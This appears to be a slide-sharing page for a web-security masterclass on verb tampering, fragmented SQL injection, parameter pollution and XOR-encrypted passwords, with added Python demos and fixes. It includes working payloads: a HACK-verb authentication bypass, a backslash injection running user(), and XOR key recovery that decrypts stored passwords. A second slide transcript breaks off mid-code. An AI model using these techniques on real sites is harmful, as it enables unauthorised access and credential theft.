Vulnerabilities in Web – Difficult Cases
(masterclass)
Greetings
Questions to discuss


   • HTTP Verb Tampering

   • Fragmented SQL Injections

   • HTTP Parameter Pollution

   • Reversible encryption
HTTP Verb Tampering

    HTTP Verb Tampering is an access-control flaw for HTTP methods: the restriction
    (usually a requirement to authenticate) is applied per method, so a request that
    uses a method the configuration does not list reaches the resource unchecked.

     • Administration error (e.g. a <Limit GET POST> block that protects only the verbs it names)

     • Particular case – vendor's error (the product ships with the restriction already scoped to specific methods)
HTTP Verb Tampering

    What's the method?
HTTP Verb Tampering

    Why?
HTTP Verb Tampering

    Exploitation

     • Real-life example (JBoss JMX Console authentication bypass, CVE-2010-0738: the
       security-constraint in web.xml listed only GET and POST, so any other verb
       reached the console unauthenticated)
HTTP Verb Tampering

    Exploitation

     • Practical task: http://stat.local/

     [screenshots: .htaccess file | Result of GET request | Result of HACK request]
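The misconfiguration behind the stat.local task, modelled locally so the probe can be run offline. This is an added example, not the masterclass's code or tool: the mini server stands in for http://stat.local/, and its "weak" policy reproduces a .htaccess whose `Require valid-user` sits inside `<Limit GET POST>` (an assumption about the task's file, which the slides only show as a screenshot); the "fixed" policy applies the requirement to every method. The probe sends a list of verbs, including the slide's HACK, and reports which ones reach the resource without credentials. Hostnames, ports and the page body are constructed for the demo.

```python
"""HTTP verb tampering: probe a local model of an Apache <Limit GET POST> rule."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Verbs that `<Limit GET POST> Require valid-user </Limit>` really protects.
# Apache applies a GET rule to HEAD as well; every other verb, known or not,
# falls through to the resource without authentication.
WEAK_LIMIT_GET_POST = frozenset({"GET", "HEAD", "POST"})
# `Require valid-user` outside any <Limit> block: None means "all methods".
FIXED_ALL_METHODS = None

PROBE_VERBS = ("GET", "HEAD", "POST", "PUT", "OPTIONS", "HACK")


class ModelHandler(BaseHTTPRequestHandler):
    """Answers like a PHP page behind the modelled .htaccess."""

    restricted = WEAK_LIMIT_GET_POST  # overridden per server in start_model_server()

    def __getattr__(self, name):
        # http.server looks up do_<METHOD> and replies 501 when it is missing.
        # Routing every verb to one handler mirrors mod_php, which runs the
        # script whatever the request method is.
        if name.startswith("do_"):
            return self._serve
        raise AttributeError(name)

    def _serve(self):
        needs_auth = self.restricted is None or self.command in self.restricted
        if needs_auth and "Authorization" not in self.headers:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="stat"')
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        body = b"secret statistics\n"  # constructed stand-in for the protected page
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging
        pass


def start_model_server(restricted):
    """Bind the model to a free loopback port; returns (server, port)."""
    handler = type("Handler", (ModelHandler,), {"restricted": restricted})
    server = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def probe_verbs(host, port, path="/", verbs=PROBE_VERBS):
    """The tester's check: send each verb unauthenticated, record the status."""
    results = {}
    for verb in verbs:
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request(verb, path)
        results[verb] = conn.getresponse().status
        conn.close()
    return results


def bypass_verbs(results):
    """Verbs that reached the resource although GET was refused."""
    if results.get("GET") != 401:
        return []
    return [verb for verb, status in results.items() if status == 200]


def run_demo():
    """Probe both policies; returns {policy name: (status per verb, bypass verbs)}."""
    outcome = {}
    for name, policy in (("weak", WEAK_LIMIT_GET_POST), ("fixed", FIXED_ALL_METHODS)):
        server, port = start_model_server(policy)
        try:
            results = probe_verbs("127.0.0.1", port)
        finally:
            server.shutdown()
            server.server_close()
        outcome[name] = (results, bypass_verbs(results))
    return outcome


if __name__ == "__main__":
    for name, (results, bypass) in run_demo().items():
        print(f"{name:5s} {results}  bypass via: {bypass or 'none'}")
```

Against a real target the same `probe_verbs()` is pointed at the host; a 401 for GET next to a 200 for an arbitrary verb is the finding. On Apache, `Require` directives placed outside any `<Limit>` block cover every method, and `<LimitExcept>` is the right construct when only some verbs are meant to be open.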
Fragmented SQL Injections

    SQL injection is a vulnerability caused by incorrect processing of input data by
    the application: user-supplied data passed through the web application alters
    the SQL query that is then executed.


      • Insufficient data filtering
Fragmented SQL Injections

       What's the method?


 Do not forget correct filtering!

 Structure of a valid request (MySQL database)

 INSERT INTO table1 (c1,c2) VALUES ('value1','value2');


 Here is a valid request with injected SQL commands (the first value ends with a
 backslash, the second one carries the payload):

 INSERT INTO table1 (c1,c2) VALUES ('a\', ', user()); -- 1');
Fragmented SQL Injections

        Why?

If the backslash ( \ ) is not filtered, an attacker can use it to escape the next
character of the database request, a single or double quote, so that the quote is
no longer interpreted as the end of the string literal.


The following is required for exploitation:
the request should include more than one string variable (the first one ends with
the backslash, the second one carries the SQL that now runs outside the literal).


 Remember: it's necessary to filter not only user data,
 but also data received from the database (second-order injection).
Fragmented SQL Injections

      Exploitation

        • Real-life example (Coppermine Photo Gallery <= 1.4.19)

      GET, POST and REQUEST parameters: the "\" character is not filtered.

      You can place a "\" in the email parameter.


 Exploitation happens through a later database query: the stored value is read
      back and reused when you access system features after authorisation.
Fragmented SQL Injections

    Exploitation

      • Practical task
      http://tracker.local/index.php

      «Bug tracking system for source code».

      • Practical task
      http://tracker.local/add.php

                              Vulnerable code (add.php file):
                              if (isset($_POST['code']) && isset($_POST['fix'])) {
                                  // htmlspecialchars() converts & < > " only: the backslash passes through untouched
                                  $code=htmlspecialchars($_POST['code']);
                                  $fix=htmlspecialchars($_POST['fix']);
                                  ….
                                  mysql_query("INSERT INTO track (bug,fix) VALUES ('".$code."','".$fix."')");
                              }

                               With ordinary input the database request looks as follows:
                               INSERT INTO track (bug,fix) VALUES ('value1','value2');

                               With code = value1\ and fix = , user()) -- 1 the request becomes:
                               INSERT INTO track (bug,fix) VALUES ('value1\', ', user()) -- 1');

                               The backslash turns the closing quote of the first value into part
                               of the literal, so the first literal is now "value1', " and the
                               second "value" is the expression user(); the trailing -- comments
                               out the rest of the statement.

      • Practical task
      http://tracker.local/view.php

                             As a result, the fix column of the track table contains the
                             result of the user() function.
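The mechanism from the "Why?" slide and the add.php task, traced end to end. This is an added example, not the masterclass's own code: it rebuilds the add.php query in Python (with a `htmlspecialchars()` stand-in that, like PHP's classic default, touches only `& < > "`), then splits the resulting statement into tokens the way MySQL's lexer does (backslash escapes, doubled quotes, `-- ` comments), so you can see which text ends up inside string literals and which is executed as SQL. `build_query_escaped()` shows the same query with `mysql_real_escape_string()`-style escaping; the payloads are constructed for the demo.

```python
"""Fragmented SQL injection traced through a MySQL-style literal tokenizer."""


def htmlspecialchars(s):
    """PHP htmlspecialchars() with its classic default flags: only & < > " are
    converted. Neither the single quote nor the backslash is touched."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def mysql_real_escape_string(s):
    """What mysql_real_escape_string() does for a single-byte connection charset."""
    table = {"\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
             "'": "\\'", '"': '\\"', "\x1a": "\\Z"}
    return "".join(table.get(ch, ch) for ch in s)


def build_query_vulnerable(code, fix):
    """add.php as shown on the slide: HTML escaping only, then string concatenation."""
    code, fix = htmlspecialchars(code), htmlspecialchars(fix)
    return f"INSERT INTO track (bug,fix) VALUES ('{code}','{fix}')"


def build_query_escaped(code, fix):
    """Same query with SQL escaping applied to each value before concatenation."""
    code = mysql_real_escape_string(htmlspecialchars(code))
    fix = mysql_real_escape_string(htmlspecialchars(fix))
    return f"INSERT INTO track (bug,fix) VALUES ('{code}','{fix}')"


_ESCAPES = {"0": "\0", "n": "\n", "r": "\r", "t": "\t", "b": "\b", "Z": "\x1a"}


def tokenize_mysql(sql):
    """Split a statement the way MySQL's lexer does for the constructs that
    matter here: quoted literals with backslash escapes and doubled quotes,
    `-- `, `#` and `/* */` comments, words and punctuation. Assumes the default
    sql_mode (NO_BACKSLASH_ESCAPES unset). Returns (kind, text) pairs; string
    tokens carry their decoded value."""
    tokens, i, n = [], 0, len(sql)
    while i < n:
        c = sql[i]
        if c.isspace():
            i += 1
        elif c in "'\"":
            quote, j, value = c, i + 1, []
            while True:
                if j >= n:
                    raise ValueError("unterminated string literal")  # MySQL: syntax error
                ch = sql[j]
                if ch == "\\" and j + 1 < n:                 # backslash escapes the next char
                    value.append(_ESCAPES.get(sql[j + 1], sql[j + 1]))
                    j += 2
                elif ch == quote and j + 1 < n and sql[j + 1] == quote:  # '' inside '...'
                    value.append(quote)
                    j += 2
                elif ch == quote:                            # closing quote
                    j += 1
                    break
                else:
                    value.append(ch)
                    j += 1
            tokens.append(("string", "".join(value)))
            i = j
        elif sql.startswith("-- ", i) or c == "#":
            end = sql.find("\n", i)
            end = n if end < 0 else end
            tokens.append(("comment", sql[i:end]))
            i = end
        elif sql.startswith("/*", i):
            end = sql.find("*/", i + 2)
            if end < 0:
                raise ValueError("unterminated comment")
            tokens.append(("comment", sql[i:end + 2]))
            i = end + 2
        elif c.isalnum() or c == "_":
            j = i
            while j < n and (sql[j].isalnum() or sql[j] == "_"):
                j += 1
            tokens.append(("word", sql[i:j]))
            i = j
        else:
            tokens.append(("punct", c))
            i += 1
    return tokens


def analyse(sql):
    """Return (executed skeleton, string literals): literals become '?', comments
    vanish. Anything left in the skeleton beyond the template is attacker SQL."""
    tokens = tokenize_mysql(sql)
    skeleton = " ".join("?" if kind == "string" else text
                        for kind, text in tokens if kind != "comment")
    literals = [text for kind, text in tokens if kind == "string"]
    return skeleton, literals


if __name__ == "__main__":
    # Constructed payloads: the first value ends in a lone backslash, the second
    # carries the SQL that is meant to run outside the literal.
    code, fix = "value1\\", ", user()) -- 1"
    for label, build in (("vulnerable", build_query_vulnerable), ("escaped", build_query_escaped)):
        sql = build(code, fix)
        skeleton, literals = analyse(sql)
        print(f"{label}: {sql}\n  executes: {skeleton}\n  literals: {literals}")
```

With `sql_mode=NO_BACKSLASH_ESCAPES` the backslash becomes an ordinary character and the trick stops working, which is why the tokenizer assumes the default mode. Prepared statements with bound parameters remove the problem regardless of escaping; whichever route is taken, values read back from the database must get the same treatment, which is the slide's second-order warning.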
HTTP Parameter Pollution

    HTTP Parameter Pollution is a vulnerability that arises because different
    platforms (the web server and the web application language, or two components
    in the same processing chain) interpret a sequence of HTTP request parameters
    with the same name differently: first occurrence, last occurrence, or all of
    them joined.
HTTP Parameter Pollution
        Technology/Environment                       Interpretation of duplicate parameters   Example (par1=val1&par1=val2)
        ASP.NET/IIS                                  Joined with a comma                      par1=val1,val2
        ASP/IIS                                      Joined with a comma                      par1=val1,val2
        PHP/Apache                                   Last parameter wins                      par1=val2
        PHP/Zeus                                     Last parameter wins                      par1=val2
        JSP, Servlet/Apache Tomcat                   First parameter wins                     par1=val1
        JSP, Servlet/Oracle Application Server 10g   First parameter wins                     par1=val1
        JSP, Servlet/Jetty                           First parameter wins                     par1=val1
        IBM Lotus Domino                             First parameter wins                     par1=val1
        IBM HTTP Server                              Last parameter wins                      par1=val2
        mod_perl, libapreq2/Apache                   First parameter wins                     par1=val1
        Perl CGI/Apache                              First parameter wins                     par1=val1
        mod_perl/Apache                              First parameter wins                     par1=val1
        mod_wsgi (Python)/Apache                     Returns an array                         ARRAY(0x8b9058c)
        Python/Zope                                  First parameter wins                     par1=val1
        IceWarp                                      Returns an array                         ['val1','val2']
        AXIS 2400                                    Last parameter wins                      par1=val2
        Linksys Wireless-G PTZ Internet Camera       Joined with a comma                      par1=val1,val2
        Ricoh Aficio 1022 Printer                    Last parameter wins                      par1=val2
        webcamXP Pro                                 First parameter wins                     par1=val1
        DBMan                                        Joined with two tildes                   par1=val1~~val2
HTTP Parameter Pollution

      In PHP.

 An interesting setting: variables_order in php.ini (defines the order in which the
 EGPCS sources are registered, and therefore which source wins in $_REQUEST).

 Why is it interesting?

 GET /?id=1
 Cookie: id=2

 Result:

 $_GET['id']=1
 $_REQUEST['id']=2

 The frequent error in request processing:
 $_GET is checked, but the value actually used is taken from $_REQUEST.
HTTP Parameter Pollution

    Exploitation

      • Real-life example (www.blogger.com blog service)

      Vulnerability reported under the «Rewarding web application security
       research» program


      Error in input processing: the first matching value is checked, but the
       last one ends up in the result.


      Presumably, the check is done on QUERY_STRING, and the variables are then
       declared from the array of data received in the request (which keeps the
       last duplicate).
HTTP Parameter Pollution

    Exploitation

      • Practical task
      http://blogger.local/index.php
HTTP Parameter Pollution

    Exploitation

      • Practical task
      http://blogger.local/register.php
HTTP Parameter Pollution

    Exploitation

      • Practical task
      http://blogger.local/invite.php
                                        gpc_order (php.ini) – "GPC"
HTTP Parameter Pollution

    Exploitation

      • Practical task
      http://blogger.local/add.php
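The platform table, the variables_order slide and the "check $_GET, use $_REQUEST" bug, modelled in one place. This is an added example, not code from the masterclass or from PHP: `resolve_duplicates()` implements the five behaviours the table lists (first wins, last wins, comma join, array, double tilde), and `php_superglobals()` builds $_GET, $_POST, $_COOKIE and $_REQUEST the way PHP does for a given order string, so the `id=1` / `Cookie: id=2` case from the slide can be reproduced. The lookup query in `vulnerable_lookup()` and the poisoned cookie value are hypothetical, constructed for the demo; PHP's handling of duplicate cookie names is deliberately left out.

```python
"""HTTP Parameter Pollution: duplicate-name resolution and PHP's $_GET vs $_REQUEST."""
from urllib.parse import unquote, unquote_plus


def parse_pairs(query_string):
    """Decode a query string or form body into (name, value) pairs, duplicates kept."""
    pairs = []
    for part in query_string.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def resolve_duplicates(pairs, style):
    """Collapse duplicate names the way the platforms in the table do.
    style: 'first' (Tomcat, Jetty, ...), 'last' (PHP/Apache, ...),
    'comma' (ASP/IIS, ASP.NET/IIS), 'array' (mod_wsgi, IceWarp), 'tildes' (DBMan)."""
    out = {}
    for name, value in pairs:
        if name not in out:
            out[name] = [value] if style == "array" else value
        elif style == "first":
            pass
        elif style == "last":
            out[name] = value
        elif style == "comma":
            out[name] = out[name] + "," + value
        elif style == "tildes":
            out[name] = out[name] + "~~" + value
        elif style == "array":
            out[name].append(value)
        else:
            raise ValueError(f"unknown style {style!r}")
    return out


def parse_cookie_header(header):
    """Cookie header to dict; PHP url-decodes cookie values. Duplicate cookie
    names are not modelled (PHP treats them differently from GET/POST)."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name and name not in cookies:
            cookies[name] = unquote(value)
    return cookies


def php_superglobals(query_string, cookie_header="", post_body="", variables_order="EGPCS"):
    """Build $_GET, $_POST, $_COOKIE and $_REQUEST as PHP does: within one
    source the last duplicate wins; $_REQUEST is filled source by source in
    variables_order (request_order when set), so later sources overwrite."""
    sources = {
        "G": resolve_duplicates(parse_pairs(query_string), "last"),
        "P": resolve_duplicates(parse_pairs(post_body), "last"),
        "C": parse_cookie_header(cookie_header),
    }
    request = {}
    for letter in variables_order.upper():
        request.update(sources.get(letter, {}))
    return {"_GET": sources["G"], "_POST": sources["P"],
            "_COOKIE": sources["C"], "_REQUEST": request}


def vulnerable_lookup(env):
    """The slide's bug: $_GET['id'] is validated, $_REQUEST['id'] is used."""
    if not env["_GET"].get("id", "").isdigit():
        raise ValueError("id rejected")
    return f"SELECT title FROM posts WHERE id={env['_REQUEST']['id']}"  # hypothetical query


def fixed_lookup(env):
    """Validate and use the same variable (a real fix also binds it as a parameter)."""
    value = env["_GET"].get("id", "")
    if not value.isdigit():
        raise ValueError("id rejected")
    return f"SELECT title FROM posts WHERE id={value}"


if __name__ == "__main__":
    pairs = parse_pairs("par1=val1&par1=val2")
    for style in ("first", "last", "comma", "array", "tildes"):
        print(f"{style:6s} -> {resolve_duplicates(pairs, style)}")
    # GET /?id=1 with a poisoned cookie, as on the variables_order slide
    env = php_superglobals("id=1", cookie_header="id=2%20OR%201%3D1")
    print("checked $_GET:", env["_GET"]["id"], " used $_REQUEST:", env["_REQUEST"]["id"])
    print("vulnerable:", vulnerable_lookup(env))
    print("fixed:     ", fixed_lookup(env))
```

The order string passed to `php_superglobals()` plays the role of variables_order (gpc_order on the slide's older setup); passing "GP" shows that cookies then never reach $_REQUEST at all, which is why the same application can be exploitable on one php.ini and not on another.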
Reversible Encryption

     Reversible encryption of stored secrets (passwords, tokens) in web applications
     is potentially insecure: whatever an attacker obtains through another flaw comes
     back as plaintext once the key is known or recovered, for instance via:


      • Exploitation of an SQL Injection vulnerability;

      • Information disclosure (database dump);

      • Arbitrary file reading (e.g. of the key material or a configuration file);

      • and so on.
Reversible Encryption

      Exploitation


 • Practical task

   http://portal.local
   http://portal.local/news.php
   http://portal.local/
   http://portal.local/xor_tool/

   FAILED.

   1. "test" user with "12345678910qwerty" password

   2. test : UFBQR1FQRk9cQ0QIFgcRBx0=

   http://portal.local/xor_tool/
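What the xor_tool step of the portal.local task amounts to, written out. This is an added example, not the masterclass's tool: the only inputs are the pair the slides hand out (user "test", password "12345678910qwerty", stored value "UFBQR1FQRk9cQ0QIFgcRBx0="). Base64-decoding the stored value gives 17 bytes, the password's length, and XORing the two gives the key stream; its first twelve bytes recur from position twelve on, so the key repeats with period 12. That the scheme is exactly base64(password XOR repeating key) is an inference from the task's xor_tool; the code reports the key the arithmetic yields rather than assuming one. The second user record is constructed for the demo.

```python
"""Known-plaintext recovery of a repeating XOR key from one stored password."""
import base64

# The pair the masterclass hands out for portal.local: user "test" and the
# stored form of its password.
KNOWN_PASSWORD = b"12345678910qwerty"
KNOWN_STORED = "UFBQR1FQRk9cQ0QIFgcRBx0="


def xor_bytes(data, key):
    """XOR data with a key repeated as often as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def keystream_from_known_pair(stored_b64, plaintext):
    """ciphertext XOR plaintext = key stream. Equal lengths are the first sanity
    check: a block cipher or any real construction would not pass it."""
    ciphertext = base64.b64decode(stored_b64)
    if len(ciphertext) != len(plaintext):
        raise ValueError("length mismatch: this is not a plain XOR of the password")
    return xor_bytes(ciphertext, plaintext)


def smallest_period(stream):
    """Shortest p with stream[i] == stream[i-p] for every i >= p. With a short
    sample the shortest period is a hypothesis; confirm it on a second pair."""
    for p in range(1, len(stream) + 1):
        if all(stream[i] == stream[i - p] for i in range(p, len(stream))):
            return p
    return len(stream)


def recover_key(stored_b64, plaintext):
    """Recover the repeating key from one (stored value, password) pair."""
    stream = keystream_from_known_pair(stored_b64, plaintext)
    return stream[:smallest_period(stream)]


def decrypt_stored(stored_b64, key):
    """Turn any stored value back into the password it protects."""
    return xor_bytes(base64.b64decode(stored_b64), key)


def encrypt_for_storage(password, key):
    """The application's side of the scheme, used here to build further records."""
    return base64.b64encode(xor_bytes(password, key)).decode("ascii")


if __name__ == "__main__":
    key = recover_key(KNOWN_STORED, KNOWN_PASSWORD)
    print("recovered key:", key)
    # A second, constructed user record encrypted under the same key.
    other = encrypt_for_storage(b"Adm1n!Pa55word", key)
    print("admin stored value:", other, "->", decrypt_stored(other, key))
```

With only 17 bytes of key stream the period is inferred from a five-byte overlap, so on a real engagement a second known account (register one) is used to confirm the key before decrypting the whole dump. The defence is not a stronger reversible cipher but a password hash (bcrypt, scrypt or PBKDF2), which is the section's point: reversible storage hands out plaintext as soon as anything else leaks.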
Instead of conclusions


     What's next?

 •   Try to do practical tasks

 •   Take part in competitions
Thank you for your attention!

Questions?

ygoltsev@ptsecurity.ru

Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 

Web injection, HTTP vulnerabilities and related issues (slide text)

  • 1. Vulnerabilities in Web – difficulties (masterclass)
  • 3. Questions to discuss • HTTP Verb Tampering • Fragmented SQL Injections • HTTP Parameter Pollution • Reversible encryption
  • 4. HTTP Verb Tampering. HTTP Verb Tampering is an access-control error in the handling of HTTP methods: the restriction is applied only to some methods (typically GET and POST), so a request that uses any other method is not checked. • Administration (configuration) error • Particular case: vendor's error (the insecure restriction ships in the product's default configuration)
  • 5. HTTP Verb Tampering. What's the method?
  • 7. HTTP Verb Tampering. Exploitation • Real-life example: JBoss auth bypass (the JMX Console's web.xml security constraint listed only GET and POST, so a request with any other method reached the console without authentication; CVE-2010-0738).
  • 8. HTTP Verb Tampering. Exploitation • Practical task: http://stat.local/ (the deck shows the .htaccess file, the result of a GET request, which is refused without credentials, and the result of a request with the made-up method HACK, which is served).
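The practical task above hinges on a `<Limit GET POST>` block protecting only the listed methods. The Python script below is an added example (not from the slides) that models how Apache applies `Require` inside `<Limit>`, inside `<LimitExcept>` and at top level, and audits an .htaccess for verbs that slip past the check. The two .htaccess texts are constructed for this example; they are not the file from stat.local.

```python
import re

# Constructed weak configuration: authentication is demanded only for GET and POST.
WEAK_HTACCESS = """
AuthType Basic
AuthName "Statistics"
AuthUserFile /var/www/.htpasswd
<Limit GET POST>
    Require valid-user
</Limit>
"""

# Constructed fix: the Require is not wrapped in <Limit>, so it applies to every method.
FIXED_HTACCESS = """
AuthType Basic
AuthName "Statistics"
AuthUserFile /var/www/.htpasswd
Require valid-user
"""

# In Apache, listing GET in <Limit>/<LimitExcept> also covers HEAD.
IMPLIED = {"GET": {"GET", "HEAD"}}

_SECTION = re.compile(r"<(Limit|LimitExcept)\s+([^>]+)>(.*?)</\1>", re.S | re.I)
# Any Require other than "Require all granted" demands something from the client.
_REQUIRES_AUTH = re.compile(r"^\s*Require\s+(?!all\s+granted)", re.M | re.I)


def _expand(methods):
    out = set()
    for m in methods:
        out |= IMPLIED.get(m, {m})
    return out


def auth_required(htaccess, method):
    """Simplified model of Apache's evaluation: does some Require apply to `method`?

    Method names are case-sensitive in Apache ('get' is not 'GET').
    Top-level Require lines apply to all methods, <Limit M...> only to the
    listed methods, <LimitExcept M...> to every method that is NOT listed.
    """
    protected = False
    for section in _SECTION.finditer(htaccess):
        kind, methods, body = section.group(1).lower(), section.group(2).split(), section.group(3)
        listed = _expand(methods)
        applies = (method in listed) if kind == "limit" else (method not in listed)
        if applies and _REQUIRES_AUTH.search(body):
            protected = True
    top_level = _SECTION.sub("", htaccess)
    if _REQUIRES_AUTH.search(top_level):
        protected = True
    return protected


def audit(htaccess, methods=("GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "HACK")):
    """Map each method to whether the configuration demands authentication for it."""
    return {m: auth_required(htaccess, m) for m in methods}


def unprotected_methods(htaccess, methods=("GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "HACK")):
    """The verbs an attacker can use to bypass the check (empty for a sound configuration)."""
    return [m for m, ok in audit(htaccess, methods).items() if not ok]


if __name__ == "__main__":
    print("weak  :", unprotected_methods(WEAK_HTACCESS))
    print("fixed :", unprotected_methods(FIXED_HTACCESS))
```

The model ignores the handler side (what a module does with an unknown method once it gets through); it only answers the question the slide asks, namely which verbs the access control never looks at. The same reasoning applies to a servlet `<security-constraint>` with explicit `<http-method>` elements: every method not listed is unconstrained.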
  • 9. Fragmented SQL Injections. SQL injection is a vulnerability caused by incorrect processing of input data by the application: user-supplied data passed through the web application alters the SQL query the application builds, and that modified query is what the attacker exploits. • Insufficient data filtering
  • 10. Fragmented SQL Injections. What's the method? Do not forget correct filtering! Structure of a valid request (MySQL database):
      INSERT INTO table1 (c1,c2) VALUES ('value1','value2');
    Here is the same request with injected SQL commands (the first value is a\ and the second is , user()); -- 1):
      INSERT INTO table1 (c1,c2) VALUES ('a\',', user()); -- 1');
    The backslash escapes the quote that was meant to close the first literal, so the first string becomes a', and the tail of the second value is executed as SQL.
  • 11. Fragmented SQL Injections. Why? If the backslash ("\") is not filtered, the attacker can use it to escape the next character, the single or double quote that the application appends to the value: the database no longer interprets that quote as the end of the string literal, and the literal runs on into the next value. Required for exploitation: the query must contain more than one user-controlled string value (the second one carries the SQL that gets executed). Remember: it is necessary to filter not only user input but also data read back from the database.
  • 12. Fragmented SQL Injections. Exploitation • Real-life example (Coppermine Photo Gallery <= 1.4.19). The "\" character is not filtered in GET, POST and REQUEST data, so "\" can be supplied in the email parameter. Exploitation is possible through a subsequent database query that is built from the stored value when system features are accessed after authorization.
  • 13. Fragmented SQL Injections. Exploitation • Practical task: http://tracker.local/index.php («Bug tracking system for source code»).
  • 14. Fragmented SQL Injections. Exploitation • Practical task: http://tracker.local/add.php. Vulnerable code (add.php file):
      if (isset($_POST['code']) && isset($_POST['fix'])) {
          $code = htmlspecialchars($_POST['code']);
          $fix  = htmlspecialchars($_POST['fix']);
          ….
          mysql_query("INSERT INTO track (bug,fix) VALUES ('".$code."','".$fix."')");
      }
    For ordinary input the database request looks as follows:
      INSERT INTO track (bug,fix) VALUES ('value1','value2');
  • 15. Fragmented SQL Injections. Exploitation • Practical task: http://tracker.local/add.php. With code = value1\ and fix = , user()); -- 1 the same code produces:
      INSERT INTO track (bug,fix) VALUES ('value1\',', user()); -- 1');
    htmlspecialchars() leaves the backslash untouched, so it escapes the quote that should have closed the first literal; the first string is now value1', and , user()) is executed as SQL while -- 1') is commented out.
  • 16. Fragmented SQL Injections. Exploitation • Practical task: http://tracker.local/view.php. As a result, the fix column of the track table contains the result of the user() function.
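The slides describe the fragmentation in words; the script below is an added example (not the deck's code) that makes it visible by building the INSERT exactly as the add.php snippet does and then splitting the result into string literals, comments and executable SQL the way MySQL's lexer would. The quote filter models the slide's precondition (quotes neutralised, as htmlspecialchars with ENT_QUOTES does, backslash untouched); the escaping function models mysql_real_escape_string and is shown only to demonstrate why escaping the backslash closes the hole. The attacker input is constructed to match the slide. Prepared statements, not escaping, are the fix to ship.

```python
# Model of PHP htmlspecialchars($s, ENT_QUOTES): quotes become entities, the backslash is untouched.
def html_quotes_filter(s):
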